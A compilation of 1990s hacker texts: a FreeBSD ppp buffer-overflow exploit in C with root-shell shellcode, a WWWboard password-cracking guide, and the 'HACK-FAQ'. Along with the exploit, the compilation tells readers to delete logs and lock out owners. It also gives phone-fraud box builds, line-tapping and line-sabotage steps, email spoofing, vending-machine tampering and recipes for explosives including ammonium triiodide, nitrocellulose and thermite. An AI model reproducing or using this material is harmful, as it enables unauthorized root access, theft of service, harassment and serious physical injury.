now on to another one, this will be the last one that Im going to show. Exploitation script for the ppp vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15. Works on
FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFFER_SIZE 156 /* size of the bufer to overflow */
#define OFFSET -290 /* number of bytes to jump after the start
of the buffer */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }
main(int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */
int i,j;
buf = malloc(4096);
/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);
ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);
}
Now that youve gotten root "whats next?" Well the choice is up to you but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while you can now upload you pages, delete all the logs and just plain do your worstJ Psychotic writes our own exploits and we will be releasing them soon, so keep your eyes open for them. We recommend that if you are serious about learing ethnical hacking that you download our Unix Bible.
~~PSYCHOTIC~~
+75
View File
@@ -0,0 +1,75 @@
How to Hack the WWWboard Message Board 2.0
written by kM
www.hackersclub.com/km
05/12/97
===========================================
If your website uses the WWWboard cgi script from Matt's Script Archive
(www.worldwidemart.com/scripts) you could be vulnerable to hackers getting
the admin id and password and deleting messages. Unfortunately Matt lists
people who use his wwwboard cgi script. Whoops...I tested the first person on his
list and yes it was a semi-good job of protection (renaming the cgi's) but I was still
able to get the password and able to go in and edit the messages. **NOTE** I didn't
though because I was satisfied with just getting in.
By default you must put the passwd.txt file in the same directory as your wwwboard.
If this is true anyone could simple download the passwd.txt file and put it against
Password crackers like Crackerjack or John the Ripper (UCF). I tested this myself
and found my wwwboard was vunerable.
You might ask... How do I fix this?? Well simple, rename the file to a unique file name.
and edit your cgi scripts to reflect the new file name. Make your password difficult..with
alpha-numeric so a password attack won't crack it.
===========================================
How to crack the passwd.txt file.
If you happen to get a hold of this file save it to your hard drive.
I'll explain how to crack it.
The passwd.txt file contains only 1 user id and 1 encrypted password.
For example: (this is mine)
km:aeMkCtJZYkUnI
By Default the id and password are
Username: WebAdmin
Password: WebBoard
Hopefully the webmaster would have changed this...
Once you get this download a copy of John the Ripper (available at the HackerZ Hideout)
You will need to edit the passwd.txt file and make it look like a Unix passwd file. This file
uses the same encryption scheme that is vulnerable to a dictionary attack.
(Q) What do you mean by edit the passwd.txt file?
(A) Make it look like this...
km:aeMkCtJZYkUnI:275:15:James. "Tiger" Gordon: /usr/email/users/jgordon:/bin/csh
Save the text file and kick off John the Ripper or Cracker Jack to hack the password.
Once you get the password go back to the site in which you got the passwd.txt file and
look at the source html code. If they use the standard settings you will see a call to
wwwboard.pl or .cgi in there. If this is true 99% of the time they didn't rename the admin
script which is wwwadmin.pl or .cgi Use this and jump right in and do your deed. However
I do suggest if you plan on deleting messages that its *YOUR* responsibility. I'm just
writing about vulnerability I found.
Send questions or comments to kM@hackersclub.com
=============================================
Copyrighted (C) 1997
by kM
All rights Reserved
+818
View File
@@ -0,0 +1,818 @@
Jun 13, 1994 19:54 from Belisarius
_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***
+---------------+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+---------------+
"Knowledge is power" --Francis Bacon
"United we stand, divided we fall" --Aesop
=+=+=+=+=+=+=+=+=+= HACK-FAQ! Non-Copyright Notice =+=+=+=+=+=+=+=+=
= =
+ MatrixMage Publications. 1994 No rights reserved. +
= =
+ This file may be redistributed provided that the file and this +
= notice remain intact. This article may not under any =
+ circumstances be resold or redistributed for compensation of any +
= kind. Distribution of THE HACK-FAQ! is encouraged and promoted. =
+ +
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
<*> Edited by <*>
# Editor-in-Chief #
Belisarius < temporary loss of E-mail >
can be reached on ISCA, Shadow, SkyNET, Brinta and
Baltimore 2600 Meetings and other nameless locations.
# Asst. Editor (non communicado) #
Neurophire (on Shadow and N P on ISCA)
A MatrixMage Electronic Publication
Special Thanks to the Following Contributors:
Z Maestro RA of ISCA Underground>
DINO RA of Shadow Hack and Crack>
Artimage RA of SKYNET Underground>
Faunus Revolution Miska Informatik
Matrixx Amarand Crypto Steelyhart aBBa / PfA
Beelzebub Redbeard Squarewave
IO CyberSorceror Caustic
Doktor Nil Skipster Walrus
CPT Ozone Abort Kyoti
Carsenio Aero Phrack
AND NOW A WORD FROM YOUR EDITOR:
Throughout history mankind has been afraid of the unknown.
Before lightning could be scientifically explained it was blamed on
the anger of the gods. This belief in mysticism persisted throughout
the ages (and still does today). Later as man acquired simple herbal
and chemical knowledge, these men were revered as mages, users of
mystical arts derived from the old gods. But as organized religion
(i.e. Christianity especially Roman Catholicism) spread and came to
dominate society (became the powers that be), the mage was no longer
revered. The mage (who only sought to understand the world around
himself and make the world a better place) was persecuted, attacked
and driven underground by the church. But driving these mages
underground (out of society) did not stop there ideas from spreading
or them from continuing to work. The church label Copernicus as a
heretic and mage and only this century has the Roman Catholic church
accepted his principles (heliocentric universe) as fact.
So are 'hackers' the same today. We surf the nets seeking
knowledge and information (and hopefully understanding). Information
and understanding the meaning and import of the information are the
two greatest commodities and bases of power in the world today.
These things are easy to disseminate and gather in the electronic
world. The matrix (cyberspace/web/net [whichever term you choose]
is able to influence and control information faster and better than
ever before. This makes many afraid of the cyberculture (not to
mention a deep-seated techno-fear of many people, anything new and
technical is bad).
We are a new breed of mage; seeking knowledge, desiring
understanding, persecuted by the powers that be. This is why I have
started this publication. We are the MatrixMages! Our mission is
to learn and to pass on that knowledge.
-=> Belisarius <=-
*********************************************************************
What is 'Cyberpunk' and the Underground?
"Every time I release a phile, or write an article for a zine, it's
vaguely like a baby. It gets stored, and copied, and sent out all
over the world, and people read it. It goes into their minds.
Something I created is buried in living tissue and consciousness
someplace. Eventually somebody uses it, and I know that I have the
power to change the world. Somewhere, someplace, somebody changed
something using information I changed or created. I helped to
change the world." --Unknown
That is the attitude of many of the people who, knowingly or not, are
members of this hyped/wired/cyber culture. Some who may read this
will see some of their undefined beliefs, hopes and feelings
reflected in the above quote. And, as the quote says, they will
help spread it. Somewhere, somehow, that quote will change the
world.
But only if you work to change it. Remember that information and
knowledge a powerful commodities. He who has information cannot
be beaten. So above all the most important thing to do in the
"Underground" is to gather information. This means that you have to
work and put in some effort. You don't get something' for nothing!
So work hard and together we can change the world!
Keep up with latest editions. (Sorry there haven't been many lately
but exams and not failing out took precedence!)
The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre,
or any contributor are not responsible for any consequences.
You use this information at your own risk.
*********************************************************************
CONTENTS
*********************************************************************
Sections
I. Phone Fun
(Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
II. Fake E-Mail
(Fooling UUCP)
III. Social Engineering
(Free sodas, Dumpster Diving, ATMs, Carding)
IV. The Big Bang
(Making Weapons and Explosives)
V. Infection
(Virii, Trojans, Worms and other creepy crawlies)
VI. NEWBIES READ THIS
(Basic Hacking)
VII. Screwing with the most widespread operating system on the net
(UNIX / AIX Hacking)
VIII. Screwing with the most secure operating system on the net
(VAX/VMS Hacking)
IX. Screwing with the most widespread operating system on PCs
(MS-DOS Hacks)
X. Finding out what that encrypted info is
(Cracking programs)
XI. How do I keep my info secure
(PGP / Cryptology)
XII. Chemistry 101
(explosive/pyrotechnic component prep)
XIII. Fun things with solder, wires, and parts
(Underground electronics)
XIV. Watching television
(cable, Pay-Per-View(PPV), scrambling)
XV. Tuning in to what's on the radio waves
(Radios and Scanning)
Appendices
A. FTP sites with useful info
B. Interesting Gophers
C. Informative USENET Newsgroups
D. Publications and Zines
E. Books
F. Files and Papers
G. Cataglogs
H. PGP Keys
*********************************************************************
=====================================================================
I. Phone Fun
(Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
WHAT IS A RED BOX AND HOW DO I MAKE ONE?
(from Doktor Nil)
First note: a redbox is merely a device which plays the tone a
payphone makes when you insert money. You just play it through the
mike on the handset. You would think that the Phone Co. would mute
the handset until you put a quarter in, and perhaps they are starting
to build phones like that, but I have yet to see one.
What you need:
- Radio Shack 33 memory Pocket Tone Dialer
- 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address
below)
- A solder gun.
- Someone who can point out the crystal in the Tone
Dialer.
Instructions:
1) Open up the back of the tone dialer. Use screwdriver.
2) Locate crystal. It should be toward the right side.
It will be smaller than the 6.5 MHz one you bought, but otherwise
vaguely similar. It is basically capsule-shaped, with two electrodes
coming out of the bottom which are soldered onto a circuit board.
It's on the _left_ side, basically the third large crystal thing from
the bottom, about 1.5 cm long, metallic, thin.
3) De-solder, and de-attach, crystal. Heat the solder that the
crystal is seated in; remove crystal.
4) Attach 6.5 MHz crystal. It is easiest just to use the solder which
is already there from the old crystal, that way there is less chance
of you dropping hot solder somewhere it shouldn't be and losing
everything. Heat first one drop of solder with the solder gun, and
seat one electrode of the 6.4 MHz crystal in it, then do the same
with the other. This is the easiest part to mess up, be careful that
both drops of solder don't run together.
5) Put cover back on. you are done.
How to use: Five presses of the "*" key will make the quarter sound.
I think fewer presses make nickel/dime sounds, but I can't remember
specifically. Here in Michigan, you can simply hold it up to the
handset and press memory recall button 1 (where you have conveniently
recorded five *'s -read the tone dialer directions on how to do this)
and get a quarter credit, _IF_ you are calling LD. Keep making the
tone to get additional credits. There is a maximum number of credits
you can have at once.
To make a local call this may not work. You need to first put in a
real coin, then you can use the redbox for additional credits. There
may be a way around this, however: Call the operator, and ask her to
dial your number for you. She should do this without asking why, it
is a regular service. If you need an excuse, say the "4" key isn't
working, or something. She will ask you to insert your money. At
this point use the redbox. If all goes well, she dials your number
and you're in business. If she says "Will you do that one more time,"
or "Who is this," or any variations, hang up and walk away.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT DO THESE CRYSTALS LOOK LIKE?
In most cases, a rectangular metal can with two bare wires coming out
of one end, and a number like "6.50000" stamped on one side.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL?
(from Matrixx)
6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
is the easiest to find (Radio Shack)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX?
The crystals are available from Digi-Key. Call 1-800-DIGIKEY
(1-800-344-4539) for more info. The part order number from
DIGI-KEY is x-415-ND
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX?
(from DINO)
For a Radio Shack conversion red box: a nickel is one * and a quarter
is 5 *'s
Here are the freqs for a red box:
$.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse
with 33 millisecond pause between each pulse
$.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66
millisecond pauses
$.05 one pulse at the above freqs for 66 milliseconds!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW DO YOU KNOW THAT THE PHONE IS A COCOT?
(from Faunus, Carsenio)
If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT
is a general term for Customer owned or "Bell-independent" phone
companies. Sometimes they are more shabbily constructed than real
fortress phones but others look about the same except for a lack of
phone company logo.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FOOLING COCOTS USING 800 NUMBERS?
You call up an 800 number as any public phone HAS too let you dial
800 numbers for free. Then you let the person who answers the 800
number hang up on you, THEN you dial your number that you want to
call free. OK MOST COCOTs disable the keypad on the phone so you
CANT just dial the number, you have to use a pocket tone dialer to
dial the number.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW DO I MAKE A BEIGE BOX?
(from Neurophyre)
Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
clips, ratchet wrench, 7/16-inch hex head
1. Cut the head off one end of the phone cord.
2. Strip the coating back about two (2) inches.
3. Look for the red wire, and the green wire.
4. Mark one clip green and put it on the green.
5. Mark the other red and put it on the red.
6. Once you have them soldered and insulated, plug the other end
(that still has the head) into a phone.
7. Go out in the daytime and look for green bases, green rectangular
things sticking about 3 feet out of the ground with a Bell logo on
the front. If you're a lamer, you'll waste your time with a
cable company box or something. I've heard of it.
8. Come back to a secluded one at night. With the wrench, open it
up.
9. Find a set of terminals (look like the threaded end of bolts
in my area) with what should be a red wire and a green wire
coming off them.
10. Plug in your beige box red to red and green to green, pick up the
phone and dial away!
Modems work too as well as taps and shit. You're using someone
else's line (unless you're an idiot) to get phone service. Don't
abuse the same line after the phone bill comes.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
BEIGE BOXING 101
Field Phreaking
by Revolution
At the beginning of the section in the Bell training manual
entitled "One million ways to catch and fry a phreak" it doesn't
have a disclaimer saying "for informational purposes only". So why
the hell should I put one here? Give this file to whoever you want,
just make sure it all stays together, same title, same byline.
Field phreaking gives you everything you've ever wanted: free
long distance calls, free teleconferencing, hi-tech revenge, anything
you can do from your own phone line and more, without paying for it,
or being afraid of being traced. Just be ready to bail if you see
sirens.
How to make a beige box: Easiest box to make. Cut your phone cord
before the jack, strip the wires a little. You should see a red
(ring) wire and a green (tip) wire. If you see yellow and black
wires too just ignore them. Put one set of alligator clips on the
red wire and one on the green wire, and you're set. (You want to
use your laptop computer, but you don't want to ruin your modem's
phone cord? Just unscrew a jack from a wall, unscrew the 4 screws on
the back, and do the same thing as above. Now you can use a phone,
laptop, anything you can plug in a jack.)
How to use: What you have is a lineman's handset. You can use it
from any bell switching apparatus (from now on sw. ap.). These are
on phone poles, where your phone line meets your house, and near
payphones. I'll go into detail below, but basically just open any
box on a telephone pole, and you'll see sets of terminals (screws),
with wires wrapped around them, just like on the back of a phone
jack. These screws are where you need to attach your alligator
clips to get a dial tone. Don't unscrew the screw, you'll just
fuck up some poor guys line, and increase your chances of getting
caught. After the wire goes around the screw, it normally twists
off into the air. Put your clip on the end of the wire. Do the
same with the other clip. If you don't get a dial tone, then
switch terminals.
On telephone poles:
TTI terminals: These must have been built by phreaks, just for
beige boxing. By far the easiest sw. ap. use. The only drawback
is that they only connect to one phone line. These are the fist
sized gray or black boxes that appear where a single phone line
meets the mother line. They look almost like outdoor electric
sockets, that have the snap up covering. They normally have the
letters TTI somewhere on the front. No bolts or screws to take
off, just snap up the top and you will see four screws. Clip in
and happy phreaking. Just click the top down and no one will ever
know you were there (except for the extra digits on their phone
bill.)
Green trees: just about the hardest sw. ap. to beige from (tied
with the bell canister) but if its the only one you can use, go for
it. These are the 3 foot high green/gray metal columns that are no
wider than a telephone pole (which makes them different then the
green bases, see below), that say "Call before digging, underground
cable," or the real old ones just have a bell sign. Usually green
trees are right at the base of phone poles, or within a foot or two
of them. These normally have two 7/16 bolts on one side of the
column, which have to be turned 1/8 a turn counterclockwise, and
the front of the base will slide off. Now you will see a sheet of
metal with a few square holes in it, that has a bolt where the
doorknob on a door would be. Ratchet this one off and the metal
sheet will swing open like a door. On one side of the sheet will
be a paper with a list of #'s this tree connects to. Inside you'll
see a mass of wires flowing from gray stalks of plastic in sets of
two. The whole mass will have a black garbage bag around it, or
some type of covering, but that shouldn't get in the way. The
wires come off the gray stalk, and then attach to the screws that
you can beige from, somewhere near the ground at the center of the
tree. These are on a little metal column, and sometimes are in a
zig-zag pattern, so its hard to find the terminals that match in
the right order to give you a dial tone.
Green bases: The gray/green boxes you see that look just like green
trees, except they are about twice or three times as wide. They
open the same as trees, except there are always 4 bolts, and when
the half slides off, inside is a big metal canister held together
with like 20 bolts. I wouldn't open it, but with a little info
from friends and some social engineering, I learned that inside is
where two underground phone lines are spliced together. Also inside
is either pressurized gas or gel. Pretty messy.
Bell canisters: attached to phone poles at waist level. They are
green (or really rusted brown) canisters about a two feet tall that
have a bell insignia on the side. They will have one or two bolts
at the very bottom of the canister, right above the base plate.
Take the bolts off and twist the canister, and it'll slide right
off. Inside is just like a green tree, except there normally isn't
the list of #'s it connects to.
Mother load: Largest sw. ap. A large gray green box, like 6 x 4,
attached to a telephone pole about three feet off the ground. a big
(foot or two diameter) cable should be coming out the top.
Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a
cabinet with double doors. Fasteners are located in the center of
the box and on the upper edge in the center. Both of these are
held on with a 7/16 bolt. Take the bolts off, and swing the doors
open. On the inside of the right door are instructions to connect
a line, and on the inside of the left door are a list of #'s the
box connects to. And in the box are the terminals. Normally 1,000
phones (yyy-sxxx, where yyy is your exchange and s is the first
number of the suffix, and xxx are the 999 phones the box connects
too).
On houses: follow the phone line to someone's house, and then down
there wall. Either it goes right into there house (then you're
screwed) or it ends in a plastic box. The newer boxes have a screw
in the middle, which you can take off with your fingers, and then
put the box back on when you're done, but the older ones are just
plastic boxes you have to rip off. Inside are 4 terminals, yellow,
black, and red and green, the two you need. Find the Christmas
colors, and phreak out.
On payphones: follow the phone line up from the phone, and sometimes
you'll find a little black box with two screws in it. Undo this,
and you'll find a nice little phone jack. You don't even need your
beige box for that one. If there's not one of those, follow the
wire to a wall it goes into, and sometimes there will be a sw. ap.
like those on houses (see above). Payphones are normally pretty
secure now though, and you probably won't find any of those.
Phreaky things you can do: Jesus, do I have to tell you lamers
everything? Anyway, free long distance calls should be pretty easy,
and get teleconferencing info from somebody else, just make sure
you ANI the # you're calling from before calling Alliance.
Hi-tech revenge!
Possibilities are endless, you have total control of this lamers
line. Most of you guys are probably way to elite for this one, but
you can disconnect his line by loosening a few screws and ripping
his wires at any sw. ap. but here's something a lot better: Get the
faggots number, and then find the mother load sw. ap. it connects
to (not the sw. ap. on his house or on the telephone pole in his
drive way, the _mother_load_) Find his # in the terminals, and then
connect the two terminals with a paper clip or an alligator clip! His phone
will be busy until ma bell
figures out what the hell is going on, and since the last place
they look is the mother load, this usually is at least a week.
Then, of course, is the funniest prank: Beige box from a major
store, like Toys R Us (that's my favorite) and call up ma bell
"Yeah, I'd like all calls to this number forwarded to (his
#)"
That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow,
phunk on IRC, or Revolution on Delphi. Any phreaks out there who
got new info, war stories or some addictive disorder and just need
somebody to talk to, E-mail revolution@delphi.com no PGP needed.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT PHONE NUMBER AM I CALLING FROM?
(from Skipster, et al)
This service is called ANI.
This number may not work, but try it anyway:
(800) 825-6060
You might want to try is dialing 311 ... a recorded message tells you
your phone #. Experiment, but 311 does work, if it doesn't and an
operator picks up, tell her that you were dialing information and
your hand must have slipped.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW DO I USE/DO ALLIANCE TELECONFERENCING?
(from Neurophire, Carsenio)
Set one of these up, it is a 1-800 dial-in conference. Then, grab
your beige box, go to some business, preferably something like a
Wal-Mart or a Radio Shack and beige box off their line. Then call
and set up a teleconference for whenever to be billed to the line
you are calling from. You'll want to know specifically what to ask
for. Alliance teleconferencing is 0-700-456-1000.
Dial the number (you're of course paying for this by the minute)
and you get automated instructions on how to choose the number of
ports for your conference call, and how to dial each participant..
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK?
(from Token)
Just scroll through your favorite business magazine and look for
800#s. Once you get a VMB system you can look for a box being used
and try the default passcodes <0000> , <9999> , etc. Like on the
INet, most people are too dumb to change their passwd. If you're
lucky you might get the root box (I did, the stupid ass's passwd
was <4321>).
=====================================================================
II. Fake E-mail
(Fooling UUCP)
HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)?
(from Beelzebub, Doktor Nil w/ Belisarius)
1. Telnet to port 25 of any internet server
(eg. telnet site.name.and.address 25)
2. If at all possible, AVOID TYPING "HELO".
3. Type: rcpt to (person to receive fake mail){ENTER}
4. Type: mail from (fake name and address){ENTER}
5. The mail server should ok each time after each name.
6. If it does not:
a) type vrfy and then the name of the person
b) as a last resort use helo, this will login your computer as
having been the source of the mail
7. Retype the commands, it should say ok now.
8. Type: data{ENTER}
9. The first line of the message will be the Subject line
10. Enter your letter
11. To send letter type a "." on an empty line.
12. Then type quit{ENTER}
13. This is traceable by any sysadmin ... don't harass people this
way.
14. If the person receiving the mail uses a shell like elm he/she
will not see the telltale fake message warning
"Apparently-To:(name)" even if not, most people wouldn't know
what it means anyway.
15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
so as to make it look more believable and cover any add-ons the
mail routine might try
16. Put a realistic mail header in the mail message to throw people
off even more. If there are To: and Date: lines then the
program probably won't add them on.
17. Also try to telnet to the site where the recipient has his
account. This works better if you know how to fool it.
=====================================================================
III. Social Engineering
(Free sodas, Dumpster Diving, ATMs, Carding)
WHAT DOES SALTING VENDING MACHINES DO?
When you take concentrated salt water (a high concentration of salt)
and squirt it into the change slot (preferably where the dollar
bills come in, though some say it doesn't matter), the salt will
short circuit the machine and out will pour change and hopefully
sodas.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ANOTHER WAY OF GETTING FREE SODAS?
This is an easier and actually more reliable way of getting free
sodas. It only wprks pn spme machines though, usually Coca-Cola.
Anyways, put in your change and as the last coin goes down the slot
start rapidly and repeatedly pressing the button of your choice.
If everything works well, then you should get two sodas and your
change back.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW ARE THE TRACKS OF ATM CARD ARRANGED?
The physical layout of the cards are standard. The logical arrangement
of the data stored on the magnetic strip varies from institution to
institution. There are some generally followed layouts, but not
mandatory.
There are actually up to three tracks on a card.
Track 1:
Designed for airline use. Contains name and possibly your account
number. This is the track that is used when the ATM greets you
by name. There is alot of variation in how things are ordered so
occasionally you get 'Greetings Q. John Smith' or
'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'.
This track is also used
with the new airline auto check in (PSA, American, etc).
Track 2:
The main operational track for online use. The first thing
on the track is the Primary Account Number (PAN). This is usually
pretty standard for all cards. Some additional info might be on the
card such as expiration date.
One interesting item is the PIN (Personal Identification Number)
offset. When an ATM verifies a PIN locally, it usually uses an
encryption scheme involving the PAN and a secret KEY. This gives you
a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got
generated). If you want to select your own PIN, they would put the
PIN OFFSET in the clear on the card. Just do modulo 10 arithmetic on
the Natural PIN plus the offset, and you have the selected PIN.
The PIN is never in the clear on your card. Knowing the PIN OFFSET
will not give you the PIN. This will require the SECRET KEY.
Track 3:
The "OFF-LINE" ATM track. It contains information such as your daily
limit, limit left, last access, account number, and expiration date.
The ATM itself could have the ability to write to this track to
update information.
=====================================================================
IV. The Big Bang
(Making Weapons and Explosives)
FLASH POWDERS:
(from Neurophyre)
Materials: Powdered magnesium, powdered potassium nitrate
1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
nitrate.
2. Light it with a long fuse cuz its so bright it might screw up your
eyes.
REAL Cherry Bomb Powder
4 parts by weight of potassium perchlorate
1 part by weight of antimony trisulfide
1 part by weight aluminum powder
Relatively Safe
3 parts by weight of potassium permanganate
2 parts by weight of aluminum powder
*VERY* Shock/Friction/Static/Heat Sensitive!
Use only if suicidal or desperate!
4 parts by weight of potassium chlorate
1 part by weight of sulfur
1 part by weight of aluminum powder
1) To use these mixtures, SEPARATELY pulverize each ingredient into a
fine powder, the finer it is, the more power you get. Use a mortar and
pestle if available, and grind GENTLY. Do not use plastic as this can
build a static charge. Remember, do them SEPARATELY.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
AMATEUR EXPLOSIVE (Ammonium Triiodide):
(from IO)
WARNING: This explosive is EXTREMELY shock sensitive when dry, and
moderately sensitive when wet!!! AVOID IT when dry! DO NOT store!
The purplish iodine vapor this produces during the explosion will stain
and corrode!
1) Take a small plastic bucket, add 3-4 inches of household ammonia.
This bucket will never be clean again, in all likelihood.
Try to get clear (non-pine, non-cloudy) ammonia. Or use an
ammonium hydroxide solution from a chemlab. This results in better
but more sensitive, and therefore dangerous crystals.
2) Drop in iodine (like you use on scratches) one drop at a time, or,
preferably, use crystals of iodine.
3) Let it settle, then pour it through a piece of cloth, discarding
the runoff.
4) Squeeze *gently* to get out excess liquid.
5) Mold it onto the thing you want to blow up, stand **way** back.
6) Wait for it to dry, and throw a rock at it.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW TO BUILD A TENNIS BALL CANNON?
1. Get six (6) tin cans.
2. From five of them remove the tops and bottoms.
3. From the last one remove only the top. (this is the last can to
make the breach)
4. The cans should overlap and be fit together to make a long barrel
closed at one end and open at the other.
___________________________________
open --> ()____)_____)_____)_____)_____)_____) <--closed
(barrel) 1 2 3 4 5 6 (breach)
5. Duct tape all of the cans together. USE LOTS OF TAPE!!
6. Put some gunpowder in the bottom of the CANnon.
7. Aim, brace the CANnon.
8. Spray hairspray or pour alcohol on the tennis ball and light.
9. Drop the ball into the can and STAND BACK!
Other ideas:
a) Make explosive tennis balls.
b) Launch potatoes.
c) Launch thumbtacks, nails, broken glass, etc.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)?
(from Terrorist's Handbook)
Materials: cotton, concentrated nitric acid, concentrated sulfuric
acid, distilled water
Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue
litmus paper
Procedure: 1. Pour 10mL of sulfuric acid into beaker.
2. Pour 10mL of nitric acid into beaker with sulfuric
acid.
3. Immediately add 0.5 gram of cotton.
4. Allow it to soak for EXACTLY three(3) minutes.
5. Remove the nitrocellulose.
6. Put the nitrocellulose into a beaker of distilled
water to wash it in.
7. Allow the material to dry.
8. Re-wash it.
9. Once neutral(acid/base) it can be dried and stored.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS THERMITE AND HOW DO I MAKE IT?
Thermite is a powder which burns incredibly hot (approx. 2200 deg C)
and can be used to burn through most anything.
Materials: powdered aluminum, powdered iron oxide
Procedure: mix the two powders together as evenly as possible
Ignition: thermite is difficult to ignite but these work
a) mix a small amount of potassium chlorate into the
thermite mixture and ignite with a few drops of
sulfuric acid
b) magnesium strip or 'sparkler' stuck into the powder
which is then lit as a fuse
=====================================================================
V. Infection
(Virii, Trojans, Worms and other creepy crawlies)
WHERE CAN I GET SOME VIRII?
The Virus eXchange BBS in Bulgaria. [number not available - :( ]
Problem: They demand a virus they don't have in their archives to
let you in. Good luck finding one. The best way is to write one,
even if it's in BASIC. It'll probably get you in. They have
THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps
from what I know! For more info, gopher to wiretap.spies.com and dig
around in their online library under technical info.
There are alot of places in the US to get virii too:
The Hell Pit in Chicago has over 1500, and they don't accept the
lame stuff like the ones written in basic, so they're all good ones.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
INTS USED:
(from Belisarius)
You want Int 18h, AH=03h,
Al==Num sectors to write
BX==offset of pointer to buffer
CH=cylinder Number
Cl=sector number
DX=head number
Dl=drive numbers
ES=segment of pointer with buffer
for CH=it's the low 8 bits of 10 bit cylinder number,
for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits),
0-5=sector number.
for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return:
